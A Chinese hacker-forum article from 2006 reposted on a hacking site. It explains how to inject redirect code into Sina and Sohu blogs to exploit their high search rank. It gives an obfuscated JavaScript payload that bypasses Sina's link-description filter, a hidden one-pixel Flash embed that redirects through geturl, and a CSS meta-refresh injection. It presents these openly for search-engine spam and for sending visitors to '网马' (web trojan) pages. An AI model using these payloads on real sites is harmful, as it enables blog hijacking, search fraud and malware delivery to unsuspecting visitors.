黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[推荐]利用新浪,搜狐域名转向
        ★★★★

利用新浪,搜狐域名转向

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-7-19 11:17:18
文章作者:光影
信息来源:红狼安全小组(www.wolfexp.net


1。新浪blog一处未过滤脚本
说简单点吧,前些时间搞google作弊的时候想用sina域名转向的时候发现的。
因为blog的pr值普遍较高,在百度和Google的权值都很大,所以我在搞搜索引勤作弊的时候
想用sina,sohu的blog域名转向我的站,后来发现新浪友情连接说明的地方未过滤,我加入以下语句转向我的站。
CODE:
<script language=JavaScript>document.write('<sc'+'ript>'+'win'+'dow.loc'+'ation="[url]http://hacker566.blog.sohu.com[/url]"</'+'scr'+'ipt>');</script>

2。搜狐flansh的geturl功能。
在baidu上找到了同样关键字的排名作弊厉害的站,其中有一个是用的sohu的blog域名转向的。
于是在很多地方都试过了转向代码,但他都给过滤了。
打开了一个sohu的blog域名,趁还没有转向之钱,查看了源代码,发现了如下代码。
CODE:
<embed style="DISPLAY: block; MARGIN: 0px auto 10px; WIDTH: 400px; HEIGHT: 3px; TEXT-ALIGN: center" src="[url]http://www.google90.com/80.swf[/url]" width="400" height="1" type="application/x-shockwave-flash" loop="false" autostart="false"></embed>

日志中加入了这个FLANSH http://www.google90.com/80.swf把FLANSH下下来后发现他的文件很小,打开后直接跳转到另一个站上,哈哈,一下全明白了。
原来直接在日志中插入了个width="400" height="1"的FLANSH,而FLANSH用了geturl的功能直接跳转的……
其他的blog域名就更好用了,在编辑CSS式样的时候在其中加入如下代码就OK啦。
CODE:
<meta http-equiv=refresh content=0;url=http://www.xxxx9.com/>

ps:blog的pr值比较大,所以在搜索中的权限也比较大,利用申请的免费blog加上热门的关键字
转向到我们的网马。。。HOHO……
文章录入:cainiaowang    责任编辑:cainiaowang 
【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
VIP 专 区
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886